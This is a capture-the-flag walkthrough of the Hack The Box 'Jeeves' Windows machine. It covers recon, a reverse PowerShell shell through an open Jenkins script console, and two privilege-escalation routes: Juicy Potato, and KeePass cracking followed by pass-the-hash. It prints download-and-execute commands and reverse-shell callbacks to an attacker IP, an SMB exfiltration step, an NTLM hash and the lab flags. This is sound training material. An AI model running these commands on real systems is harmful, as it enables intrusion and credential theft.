Windows Boxes

jeeves

  1. nmapAutomator.sh
    1. nmap
      1. nmap vulns
    2. recon
      1. gobuster
      2. nikto
  2. webserver 80
  3. webserver 50000
    1. searchsploit
      1. directory traversal
  4. Initial foothold
    1. /askjeeves
      1. manage jenkins
        1. script console (cmd execution)
        2. Invoke_PowershellTcp
  5. priv esc to root
    1. windows-exploit-suggester
    2. juicy potato
      1. download jp to victim
        1. shell.bat
      2. jp.exe -t * -p shell.bat -l 9001
      3. rev shell
    3. intended way
      1. smbshare
      2. keepass2john
      3. kpcli
        1. entries
      4. pth-winexe/psexec privesc
      5. using powershell commands in limited shell
  6. hm.txt
  7. user/root flags
  8. lessons learned

jeeves

images/1261-1.png
images/1261-2.png

nmapAutomator.sh

Lets run Tib3rius' Nmap Auto scan to start with
nmapAutomator.sh 10.10.10.63 All
• nmap
• recon

nmap

images/1263-1.png

webserver is running on port 80
SMB is running on ports 135 and 445
another webserver seems to be running on port 50000
images/1263-2.png
images/1263-3.png







nmap vulns

images/1265-1.png

images/1265-2.png

recon

gobuster 80,50000
nikto

gobuster

port 80 gobuster

images/1270-1.png

port 50000
images/1270-2.png

nikto

images/1271-1.png

webserver 80

images/1266-1.png

error.html is just a picture and is most likely there to mislead us if we attempt to enumerate it
images/1266-2.png
images/1266-3.png

the page source shows this "error message" is just a picture
images/1266-4.png
images/1266-5.png

webserver 50000

images/1267-1.png


images/1267-2.pngwe have a version

searchsploit

Note: DEAD END

jetty was version 9.4, no luck here besides the directory traversal
images/1268-1.png

directory traversal

images/1269-1.png

images/1269-2.png

lets try navigating to
10.10.10.63:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key

images/1269-3.png
no luck, jetty does not seem to have any known exploits

Initial foothold

since we've run into nothing but rabbit holes at this point lets try a different wordlist for gobuster

gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
images/1275-1.png

we see we have a hit for /askjeeves
images/1275-2.png

/askjeeves

apparently the Jenkins administrative panel is not password protected? Huge security misconfiguration here.
images/1274-1.png

manage jenkins

script console catches the eye
images/1276-1.png
executes arbitary script for administration/trouble-shooting/diagnostics

script console (cmd execution)

images/1277-1.png

we see we have command execution!

Invoke_PowershellTcp

gonna use nishang here to call back a reverse powershell back to our attack machine

1. first thing is to copy the nishang script to our pwd
2. add the Invoke-PowershellTcp -Reverse - Ipaddress 10.10.14.62 -p 4444 to the script
3. next is to upload it to our victim using IEX downloadstring command

images/1278-1.png



images/1278-2.png


cmd = "powershell IEX (new-object net.webclient).downloadstring('http://10.10.14.62:5555/revshell.ps1')"

images/1278-3.png

images/1278-4.png

and we see we get our shell called back to us!
images/1278-5.png

priv esc to root

lets enuemrate jeeves security misconfigurations with windows exploit suggester first since that's a favorite of mine
windows-exploit-suggestor
• juicy potato
• intended way


windows-exploit-suggester

first we grab the systeminfo panel of the box and save it to a file

images/1281-1.png
python windows-exploit-suggester.py -d 2020-07-02-mssb.xls -i /root/Documents/htb/boxes/jeeves/system
images/1281-2.png
images/1281-3.png
images/1281-4.png
images/1281-5.png
images/1281-6.png


juicy potato

first thing we need to do is download juicy potato to our machine

images/1283-1.png

I open with archive manager because the save file option gives us an empty file
images/1283-2.png

download jp to victim

first set up the webserver

copy another invoke-powershelltcp.ps1 and have it run a reverse shell back to us on a port of our choosing

images/1286-1.png
Invoke-powershelltcp -reverse -IPAddress 10.10.14.62 -port 6666
images/1286-2.png

images/1286-3.png

download the exploits to our victim with the following powershell commands:
IEX(new-object net.webclient).downloadfile('http://10.10.14.62:5555/jp.exe', ‘C:\Users\kohsuke\Desktop\jp.exe’)

IEX(new-object net.webclient).downloadfile('http://10.10.14.62:5555/shell.bat', 'C:\Users\kohsuke\Desktop\shell.bat')
images/1286-4.png

shell.bat

simple batch file to run invoke-powershelltcp.ps1

@ECHO OFF
PowerShell.exe -Command "IEX(new-object net.webclient).downloadstring('http://10.10.14.62:5555/revshell2.ps1')"
PAUSE
images/1288-1.png

jp.exe -t * -p shell.bat -l 9001

./jp.exe -t * -p shell.bat -l 9001
-t: create process call. for this option we’ll use * to test both options.
-p: the program to run. we’ll need to create a batch script that sends a reverse shell back to our attack machine.
-l: com server listen port.

images/1287-1.png
(because its over 9000)

rev shell

and we're nt authority/system!
images/1285-1.png

intended way

There is a keepass database file located in Kohsuke's Documents folder that may contain sensitive data we can use to escalate our privileges to root
images/1284-1.png
first we need to exfiltrate this program to our attacking machine and since certutil isn't on this box we'll need to set up an smbshare and transfer it back to our attack machine

smbshare

first we'll set up our own smb share we'll use impacket's built in smb server
and then copy CEH.kdbx to it

impacket-smbserver temp .
where
temp is the name of our smb server
and . puts it in smbshare in the current directory
images/1291-1.png

New-PSDrive -Name temp -PSProvider "FileSystem" -Root "\\10.10.14.62\temp"
images/1291-2.png

navigate to the share
cd temp:
images/1291-3.png

copy CEH.kdbx to the smbshare
images/1291-4.png

and now we have it on our attack machine
images/1291-5.png

keepass2john

because the keepass database is password protected we'll need to brute force it with John

keepass2john CEH.kdbx
images/1292-1.png
save this hash to a txt file for john to crack

we see here that john has the potential to brute force KeePass hashes, exactly what we're looking for
images/1292-2.png

lets run john with the following:
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
images/1292-3.png

our password is cracked images/1292-4.png

kpcli

Now we have all the information we need to open the KeePass database. To do that from the command line, we’ll use the kpcli program.

kpcli --kdb CEH.kdbx
and enter the moonshine1 pw
images/1293-1.png


entries

to show each file in our entry list,

show -f <#>
where -f will unveil originally censored data
images/1296-1.png


I’m not going to bother with admin and bob because I know from the net user command that they’re not users on the system. The Backup stuff entry however contains what looks like an NTLM hash.
images/1296-2.png
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

pth-winexe/psexec privesc

Let’s try a pass the hash attack on the administrator account.
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

be sure to separate the user and the hash with a %!
pth-winexe --user=administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe
images/1294-1.png

and we're admin!

we can use our ntlm hash in psexec as well
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.10.10.63
images/1294-2.png
images/1294-3.png

using powershell commands in limited shell

since we don't have a powershell running through our psexec/pth-winexe connections, we can use the command

powershell (Get-Content -path hm.txt -stream root.txt)
images/1298-1.png

hm.txt

we're not done yet after we get root:
images/1289-1.png
images/1289-2.png
"Look deeper" is hinting that hm.txt has more content inside it, there's a module we can use to check

follow the stream with the command
Get-Item -path hm.txt -stream *
images/1289-3.png

Get-Content -path hm.txt -stream root.txt
images/1289-4.png

user/root flags

images/1279-1.png
e3232272596fb47950d59c4cf1e7066a

images/1279-2.png
afbc5bd4b615a60648cec41c6ac92530

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
images/1295-1.png